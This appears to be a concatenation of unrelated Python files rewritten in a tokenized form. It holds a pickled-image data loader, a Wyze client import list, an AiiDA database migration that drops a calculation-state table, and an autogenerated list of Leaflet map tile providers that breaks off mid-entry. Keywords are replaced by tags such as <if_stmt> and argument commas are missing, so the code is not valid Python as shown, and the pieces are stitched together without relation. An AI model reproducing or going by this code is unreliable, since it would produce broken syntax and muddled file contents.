pickles)<block_start><if_stmt><not>isinstance(obj dict)<block_start><raise>TypeError("%s has the wrong format (part of %s set)"%(pick CLASS_NAME[index]))<block_end><try_stmt><block_start>data.append(obj["data"])<line_sep>labels.append(numpy.array(obj["labels"] dtype=Loader.LABEL_DTYPE))<block_end><except_stmt>KeyError<as>e<block_start>self.error("%s has the wrong format (part of %s set)" pick CLASS_NAME[index])<line_sep><raise>from_none(e)<block_end><block_end>lengths=[0 sum(len(l)<for>l labels)]<for_stmt>arr data<block_start>lengths[0]<augadd>arr.shape[0]<if_stmt>arr.shape[1:]<ne>data[0].shape[1:]<block_start><raise>error.BadFormatError("Array has a different shape: expected %s, got %s"<concat>"(%s set)"%(data[0].shape[1:] arr.shape[1:] CLASS_NAME[index]))<block_end><block_end><if_stmt>lengths[0]<ne>lengths[1]<block_start><raise>error.BadFormatError("Data and labels has the different number of samples (data %d,"<concat>" labels %d)"%lengths)<block_end>length=lengths[0]<line_sep>self.class_lengths[index]=length<line_sep><return>length data labels<block_end><block_end>@implementer(IImageLoader)<class_stmt>PicklesImageFullBatchLoader(PicklesLoader FullBatchImageLoader)<block_start>MAPPING="full_batch_pickles_image"<def_stmt>__init__ self workflow **kwargs<block_start>super(PicklesImageFullBatchLoader self).__init__(workflow **kwargs)<line_sep># Since we can not extract the color space information from pickles # set it explicitly without any default value self.color_space=kwargs["color_space"]<block_end><def_stmt>get_image_label self key<block_start><return>int(self.image_labels[key])<block_end><def_stmt>get_image_info self key<block_start><return>self.image_data[key].shape[:2] self.color_space<block_end><def_stmt>get_image_data self key<block_start><return>self.image_data[key]<block_end><def_stmt>get_keys self index<block_start>offsets=[0 self.class_lengths[0] self.class_lengths[0]+self.class_lengths[1] self.total_samples]<line_sep>self.original_shape=self.image_data.shape[1:-1]<line_sep><return>range(offsets[index] offsets[index+1])<block_end><def_stmt>reshape self shape<block_start><if_stmt>shape[0]<eq>COLOR_CHANNELS_MAP[self.color_space]<block_start><return>shape[1:]+(shape[0] )<block_end><return>shape<block_end><def_stmt>transform_data self data<block_start><if_stmt>data.shape[1]<eq>COLOR_CHANNELS_MAP[self.color_space]<block_start><return>interleave(data)<block_end><return>data<block_end><def_stmt>load_data self<block_start>PicklesLoader.load_data(self)<line_sep>self.original_class_lengths=self.class_lengths<line_sep>self.image_data=self.original_data.mem<line_sep>self.original_data.mem=<none><line_sep>self.image_labels=self.original_labels[:]<del_stmt>self.original_labels[:]<line_sep>FullBatchImageLoader.load_data(self)<assert_stmt>self.original_class_lengths<eq>self.class_lengths<del_stmt>self.image_data<block_end><def_stmt>initialize self device **kwargs<block_start>super(PicklesImageFullBatchLoader self).initialize(device=device **kwargs)<del_stmt>self.image_labels<block_end><block_end>
<import_from_stmt>.api_service ApiServiceClient# noqa <import_from_stmt>.auth_service AuthServiceClient# noqa <import_from_stmt>.earth_service EarthServiceClient# noqa <import_from_stmt>.ford_service FordServiceClient# noqa <import_from_stmt>.general_api_service GeneralApiServiceClient# noqa <import_from_stmt>.platform_service PlatformServiceClient# noqa <import_from_stmt>.scale_service ScaleServiceClient# noqa <import_from_stmt>.venus_service VenusServiceClient# noqa <import_from_stmt>.wyze_response WyzeResponse# noqa
# -*- coding: utf-8 -*- ########################################################################### # Copyright (c), The AiiDA team. All rights reserved. # # This file is part of the AiiDA code. # # # # The code is hosted on GitHub at https://github.com/aiidateam/aiida-core # # For further information on the license, see the LICENSE.txt file # # For further information please visit http://www.aiida.net # ########################################################################### # pylint: disable=invalid-name,no-member """Drop the DbCalcState table Revision ID: <KEY> Revises: a603da2cc809 Create Date: 2018-11-14 08:37:13.719646 """<import_from_stmt>alembic op<import_stmt>sqlalchemy<as>sa<import_from_stmt>sqlalchemy.dialects postgresql<line_sep># revision identifiers, used by Alembic. revision='<KEY>'<line_sep>down_revision='a603da2cc809'<line_sep>branch_labels=<none><line_sep>depends_on=<none><def_stmt>upgrade <block_start>op.drop_table('db_dbcalcstate')<block_end><def_stmt>downgrade <block_start>op.create_table('db_dbcalcstate' sa.Column('id' sa.INTEGER() nullable=<false>) sa.Column('dbnode_id' sa.INTEGER() autoincrement=<false> nullable=<true>) sa.Column('state' sa.VARCHAR(length=255) autoincrement=<false> nullable=<true>) sa.Column('time' postgresql.TIMESTAMP(timezone=<true>) autoincrement=<false> nullable=<true>) sa.ForeignKeyConstraint(['dbnode_id'] ['db_dbnode.id'] name='db_dbcalcstate_dbnode_id_fkey' ondelete='CASCADE' initially='DEFERRED' deferrable=<true>) sa.PrimaryKeyConstraint('id' name='db_dbcalcstate_pkey') sa.UniqueConstraint('dbnode_id' 'state' name='db_dbcalcstate_dbnode_id_state_key'))<block_end>
""" Tile providers. This file is autogenerated! It is a python representation of the leaflet providers defined by the leaflet-providers.js extension to Leaflet (https://github.com/leaflet-extras/leaflet-providers). Credit to the leaflet-providers.js project (BSD 2-Clause "Simplified" License) and the Leaflet Providers contributors. Generated by parse_leaflet_providers.py at 2019-08-01 from leaflet-providers at commit 9eb968f8442ea492626c9c8f0dac8ede484e6905 (Bumped version to 1.8.0). """<class_stmt>Bunch(dict)<block_start>"""A dict with attribute-access"""<def_stmt>__getattr__ self key<block_start><try_stmt><block_start><return>self.__getitem__(key)<block_end><except_stmt>KeyError<block_start><raise>AttributeError(key)<block_end><block_end><def_stmt>__dir__ self<block_start><return>self.keys()<block_end><block_end><class_stmt>TileProvider(Bunch)<block_start>""" A dict with attribute-access and that can be called to update keys """<def_stmt>__call__ self **kwargs<block_start>new=TileProvider(self)# takes a copy preserving the class new.update(kwargs)<line_sep><return>new<block_end><block_end>providers=Bunch(OpenStreetMap=Bunch(Mapnik=TileProvider(url='https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png' max_zoom=19 attribution='(C) OpenStreetMap contributors' name='OpenStreetMap.Mapnik') DE=TileProvider(url='https://{s}.tile.openstreetmap.de/tiles/osmde/{z}/{x}/{y}.png' max_zoom=18 attribution='(C) OpenStreetMap contributors' name='OpenStreetMap.DE') CH=TileProvider(url='https://tile.osm.ch/switzerland/{z}/{x}/{y}.png' max_zoom=18 attribution='(C) OpenStreetMap contributors' bounds=[[45 5] [48 11]] name='OpenStreetMap.CH') France=TileProvider(url='https://{s}.tile.openstreetmap.fr/osmfr/{z}/{x}/{y}.png' max_zoom=20 attribution='(C) Openstreetmap France | (C) OpenStreetMap contributors' name='OpenStreetMap.France') HOT=TileProvider(url='https://{s}.tile.openstreetmap.fr/hot/{z}/{x}/{y}.png' max_zoom=19 attribution='(C) OpenStreetMap contributors, Tiles style by Humanitarian OpenStreetMap Team hosted by OpenStreetMap France' name='OpenStreetMap.HOT') BZH=TileProvider(url='https://tile.openstreetmap.bzh/br/{z}/{x}/{y}.png' max_zoom=19 attribution='(C) OpenStreetMap contributors, Tiles courtesy of Breton OpenStreetMap Team' bounds=[[46.2 -5.5] [50 0.7]] name='OpenStreetMap.BZH')) OpenSeaMap=TileProvider(url='https://tiles.openseamap.org/seamark/{z}/{x}/{y}.png' attribution='Map data: (C) OpenSeaMap contributors' name='OpenSeaMap') OpenPtMap=TileProvider(url='http://openptmap.org/tiles/{z}/{x}/{y}.png' max_zoom=17 attribution='Map data: (C) OpenPtMap contributors' name='OpenPtMap') OpenTopoMap=TileProvider(url='https://{s}.tile.opentopomap.org/{z}/{x}/{y}.png' max_zoom=17 attribution='Map data: (C) OpenStreetMap contributors, SRTM | Map style: (C) OpenTopoMap (CC-BY-SA)' name='OpenTopoMap') OpenRailwayMap=TileProvider(url='https://{s}.tiles.openrailwaymap.org/standard/{z}/{x}/{y}.png' max_zoom=19 attribution='Map data: (C) OpenStreetMap contributors | Map style: (C) OpenRailwayMap (CC-BY-SA)' name='OpenRailwayMap') OpenFireMap=TileProvider(url='http://openfiremap.org/hytiles/{z}/{x}/{y}.png' max_zoom=19 attribution='Map data: (C) OpenStreetMap contributors | Map style: (C) OpenFireMap (CC-BY-SA)' name='OpenFireMap') SafeCast=TileProvider(url='https://s3.amazonaws.com/te512.safecast.org/{z}/{x}/{y}.png' max_zoom=16 attribution='Map data: (C) OpenStreetMap contributors | Map style: (C) SafeCast (CC-BY-SA)' name='SafeCast') Thunderforest=Bunch(OpenCycleMap=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='cycle' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.OpenCycleMap') Transport=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='transport' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.Transport') TransportDark=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='transport-dark' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.TransportDark') SpinalMap=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='spinal-map' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.SpinalMap') Landscape=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='landscape' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.Landscape') Outdoors=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='outdoors' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.Outdoors') Pioneer=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='pioneer' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.Pioneer') MobileAtlas=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='mobile-atlas' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.MobileAtlas') Neighbourhood=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='neighbourhood' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.Neighbourhood')) OpenMapSurfer=Bunch(Roads=TileProvider(url='https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png' max_zoom=19 variant='roads' attribution='Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors' name='OpenMapSurfer.Roads') Hybrid=TileProvider(url='https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png' max_zoom=19 variant='hybrid' attribution='Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors' name='OpenMapSurfer.Hybrid') AdminBounds=TileProvider(url='https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png' max_zoom=18 variant='adminb' attribution='Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors' name='OpenMapSurfer.AdminBounds') ContourLines=TileProvider(url='https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png' max_zoom=18 variant='asterc' attribution='Imagery from GIScience Research Group @ University of Heidelberg | Map data ASTER GDEM' min_zoom=13 name='OpenMapSurfer.ContourLines') Hillshade=TileProvider(url='https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png' max_zoom=18 variant='asterh' attribution='Imagery from GIScience Research Group @ University of Heidelberg | Map data ASTER GDEM, SRTM' name='OpenMapSurfer.Hillshade') ElementsAtRisk=TileProvider(url='https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png' max_zoom=19 variant='elements_at_risk' attribution='Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors' name='OpenMapSurfer.ElementsAtRisk')) Hydda=Bunch(Full=TileProvider(url='https://{s}.tile.openstreetmap.se/hydda/{variant}/{z}/{x}/{y}.png' max_zoom=18 variant='full' attribution='Tiles courtesy of OpenStreetMap Sweden -- Map data (C) OpenStreetMap contributors' name='Hydda.Full') Base=TileProvider(url='https://{s}.tile.openstreetmap.se/hydda/{variant}/{z}/{x}/{y}.png' max_zoom=18 variant='base' attribution='Tiles courtesy of OpenStreetMap Sweden -- Map data (C) OpenStreetMap contributors' name='Hydda.Base') RoadsAndLabels=TileProvider(url='https://{s}.tile.openstreetmap.se/hydda/{variant}/{z}/{x}/{y}.png' max_zoom=18 variant='roads_and_labels' attribution='Tiles courtesy of OpenStreetMap Sweden -- Map data (C) OpenStreetMap contributors' name='Hydda.RoadsAndLabels')) MapBox=TileProvider(url='https://api.tiles.mapbox.com/v4/{id}/{z}/{x}/{y}{r}.png?access_token={accessToken}' attribution='(C) Mapbox (C) OpenStreetMap contributors Improve this map' subdomains='abcd' id='mapbox.streets' accessToken='<insert your access token here>' name='MapBox') Stamen=Bunch(Toner=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toner' ext='png' name='Stamen.Toner') TonerBackground=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toner-background' ext='png' name='Stamen.TonerBackground') TonerHybrid=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toner-hybrid' ext='png' name='Stamen.TonerHybrid') TonerLines=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toner-lines' ext='png' name='Stamen.TonerLines') TonerLabels=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toner-labels' ext='png' name='Stamen.TonerLabels') TonerLite=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toner-lite' ext='png' name='Stamen.TonerLite') Watercolor=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=1 max_zoom=16 variant='watercolor' ext='jpg' name='Stamen.Watercolor') Terrain=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=18 variant='terrain' ext='png' name='Stamen.Terrain') TerrainBackground=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=18 variant='terrain-background' ext='png' name='Stamen.TerrainBackground') TopOSMRelief=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toposm-color-relief' ext='jpg' bounds=[[22 -132] [51 -56]] name='Stamen.TopOSMRelief') TopOSMFeatures=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toposm-features' ext='png' bounds=[[22 -132] [51 -56]] opacity=0.9 name='Stamen.TopOSMFeatures')) Esri=Bunch(WorldStreetMap=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='World_Street_Map' attribution='Tiles (C) Esri -- Source: Esri, DeLorme, NAVTEQ, USGS, Intermap, iPC, NRCAN, Esri Japan, METI, Esri China (Hong Kong), Esri (Thailand), TomTom, 2012' name='Esri.WorldStreetMap') DeLorme=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='Specialty/DeLorme_World_Base_Map' attribution='Tiles (C) Esri -- Copyright: (C)2012 DeLorme' min_zoom=1 max_zoom=11 name='Esri.DeLorme') WorldTopoMap=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='World_Topo_Map' attribution='Tiles (C) Esri -- Esri, DeLorme, NAVTEQ, TomTom, Intermap, iPC, USGS, FAO, NPS, NRCAN, GeoBase, Kadaster NL, Ordnance Survey, Esri Japan, METI, Esri China (Hong Kong), and the GIS User Community' name='Esri.WorldTopoMap') WorldImagery=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='World_Imagery' attribution='Tiles (C) Esri -- Source: Esri, i-cubed, USDA, USGS, AEX, GeoEye, Getmapping, Aerogrid, IGN, IGP, UPR-EGP, and the GIS User Community' name='Esri.WorldImagery') WorldTerrain=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='World_Terrain_Base' attribution='Tiles (C) Esri -- Source: USGS, Esri, TANA, DeLorme, and NPS' max_zoom=13 name='Esri.WorldTerrain') WorldShadedRelief=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='World_Shaded_Relief' attribution='Tiles (C) Esri -- Source: Esri' max_zoom=13 name='Esri.WorldShadedRelief') WorldPhysical=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='World_Physical_Map' attribution='Tiles (C) Esri -- Source: US National Park Service' max_zoom=8 name='Esri.WorldPhysical') OceanBasemap=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='Ocean_Basemap' attribution='Tiles (C) Esri -- Sources: GEBCO, NOAA, CHS, OSU, UNH, CSUMB, National Geographic, DeLorme, NAVTEQ, and Esri' max_zoom=13 name='Esri.OceanBasemap') NatGeoWorldMap=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='NatGeo_World_Map' attribution='Tiles (C) Esri -- National Geographic, Esri, DeLorme, NAVTEQ, UNEP-WCMC, USGS, NASA, ESA, METI, NRCAN, GEBCO, NOAA, iPC' max_zoom=16 name='Esri.NatGeoWorldMap') WorldGrayCanvas=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='Canvas/World_Light_Gray_Base' attribution='Tiles (C) Esri -- Esri, DeLorme, NAVTEQ' max_zoom=16 name='Esri.WorldGrayCanvas')) OpenWeatherMap=Bunch(Clouds=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='clouds' name='OpenWeatherMap.Clouds') CloudsClassic=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='clouds_cls' name='OpenWeatherMap.CloudsClassic') Precipitation=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='precipitation' name='OpenWeatherMap.Precipitation') PrecipitationClassic=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='precipitation_cls' name='OpenWeatherMap.PrecipitationClassic') Rain=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='rain' name='OpenWeatherMap.Rain') RainClassic=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='rain_cls' name='OpenWeatherMap.RainClassic') Pressure=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='pressure' name='OpenWeatherMap.Pressure') PressureContour=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='pressure_cntr' name='OpenWeatherMap.PressureContour') Wind=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='wind' name='OpenWeatherMap.Wind') Temperature=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='temp' name='OpenWeatherMap.Temperature') Snow=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='snow' name='OpenWeatherMap.Snow')) HERE=Bunch(normalDay=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDay') normalDayCustom=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day.custom' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDayCustom') normalDayGrey=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day.grey' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDayGrey') normalDayMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDayMobile') normalDayGreyMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day.grey.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDayGreyMobile') normalDayTransit=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day.transit' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDayTransit') normalDayTransitMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day.transit.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDayTransitMobile') normalNight=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.night' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalNight') normalNightMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.night.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalNightMobile') normalNightGrey=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.night.grey' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalNightGrey') normalNightGreyMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.night.grey.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalNightGreyMobile') normalNightTransit=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.night.transit' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalNightTransit') normalNightTransitMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.night.transit.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalNightTransitMobile') reducedDay=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='reduced.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.reducedDay') reducedNight=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' 